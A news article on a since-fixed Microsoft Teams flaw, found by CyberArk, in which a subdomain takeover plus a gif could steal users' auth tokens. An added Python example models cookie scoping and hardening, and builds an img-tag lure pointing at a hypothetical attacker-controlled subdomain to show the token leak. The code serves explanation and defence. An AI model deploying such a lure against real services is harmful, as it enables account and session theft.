
Microsoft fixes leak in Teams that allowed subdomain takeover with gif file – Computer – News

Microsoft has fixed a vulnerability in its video chat platform Teams that allowed attackers to take over the account of any user who viewed a malicious .gif file. The flaw affected both the desktop and web versions.

The vulnerability was discovered by security company CyberArk. The researchers found that Teams accounts could be taken over through a subdomain of teams.microsoft.com. Every time Teams is opened, a new temporary access token is generated, and access is additionally controlled via cookies. One of those cookies was also sent to subdomains of teams.microsoft.com, and CyberArk found that such a subdomain was vulnerable to takeover.

Because that cookie was shared with the subdomain, an attacker who controlled it could steal the authentication token of any user whose client was directed there, for example by getting the user to click a malicious link. The researchers also found a way to do this with a gif file: when the image is loaded from the attacker-controlled subdomain, the token is automatically sent along with the request, so it could be stolen from any Teams user who merely viewed the gif.
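The mechanism described above comes down to cookie scoping: a cookie bound to the parent domain teams.microsoft.com is attached to requests for any host beneath it, so a single image fetch from a taken-over subdomain carries the token to the attacker. The following is an added example, not CyberArk's or Microsoft's code, that models RFC 6265 domain matching to show this; the cookie names and values, the host-only "hardened" variant and the attacker host name takeover-example.teams.microsoft.com are constructed assumptions.

```python
# Added example (not CyberArk's or Microsoft's code): models RFC 6265 cookie
# scoping to show why a cookie bound to the parent domain teams.microsoft.com
# is sent to *any* subdomain, so a taken-over subdomain can collect it with a
# single image fetch.  Cookie names/values and the attacker host are constructed.
from dataclasses import dataclass
from urllib.parse import urlsplit


@dataclass(frozen=True)
class Cookie:
    name: str
    value: str
    domain: str        # host the cookie belongs to, without a leading dot
    host_only: bool    # True when Set-Cookie carried no Domain attribute
    secure: bool = True


def domain_matches(request_host: str, cookie_domain: str) -> bool:
    """RFC 6265 section 5.1.3: request_host domain-matches cookie_domain if
    they are equal, or the cookie domain is a suffix preceded by a dot and the
    request host is a name rather than an IP literal."""
    rh = request_host.lower().rstrip(".")
    cd = cookie_domain.lower().strip(".")
    if rh == cd:
        return True
    if rh.replace(".", "").isdigit():   # dotted-decimal IPv4 never matches
        return False
    return rh.endswith("." + cd)


def cookies_for_request(jar, url: str):
    """Cookies a standards-following client would attach to a request for url."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    sent = []
    for c in jar:
        if c.secure and parts.scheme != "https":
            continue                    # Secure cookies never go over plain http
        if c.host_only:
            if host != c.domain.lower():
                continue                # host-only: exact host match required
        elif not domain_matches(host, c.domain):
            continue                    # domain cookie: parent domain and all subdomains
        sent.append(c)
    return sent


def leaked_cookie_names(jar, url: str):
    return sorted(c.name for c in cookies_for_request(jar, url))


# Constructed jar: 'authtoken' stands in for the cookie the article says was
# forwarded to subdomains (scoped to the parent domain); 'host_only_session'
# is a contrasting host-only cookie.  Values are placeholders.
PARENT = "teams.microsoft.com"
WEAK_JAR = [
    Cookie("authtoken", "placeholder-token", PARENT, host_only=False),
    Cookie("host_only_session", "placeholder-session", PARENT, host_only=True),
]
# Hardened variant: the same cookie set without a Domain attribute, so it is
# host-only and is not shared with any subdomain.
HARDENED_JAR = [
    Cookie("authtoken", "placeholder-token", PARENT, host_only=True),
    Cookie("host_only_session", "placeholder-session", PARENT, host_only=True),
]

# Hypothetical subdomain assumed to be under attacker control after a takeover.
ATTACKER_HOST = "takeover-example.teams.microsoft.com"
LURE_URL = f"https://{ATTACKER_HOST}/lure.gif"


def lure_message_html() -> str:
    """Shape of the lure: a chat message whose image the victim's client fetches."""
    return f'<img src="{LURE_URL}" alt="">'


if __name__ == "__main__":
    print("message:", lure_message_html())
    print("weak jar, fetch of lure  ->", leaked_cookie_names(WEAK_JAR, LURE_URL))
    print("hardened jar, same fetch ->", leaked_cookie_names(HARDENED_JAR, LURE_URL))
    print("look-alike domain        ->",
          leaked_cookie_names(WEAK_JAR, "https://teams.microsoft.com.evil.example/"))
```

With the weak jar the lure fetch carries authtoken to the attacker's subdomain, while the hardened jar sends nothing there; the look-alike domain teams.microsoft.com.evil.example gets nothing in either case because it is not a subdomain. In real browsers the same effect is obtained by setting sensitive cookies without a Domain attribute (or with the __Host- prefix, which enforces host-only, Secure and Path=/), so that a dangling subdomain no longer yields a session.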

The vulnerability affected both the web version and the desktop client of Teams. CyberArk reported it to Microsoft a month ago, and the company has since fixed it. According to Microsoft, there are no indications that the vulnerability was actively exploited.
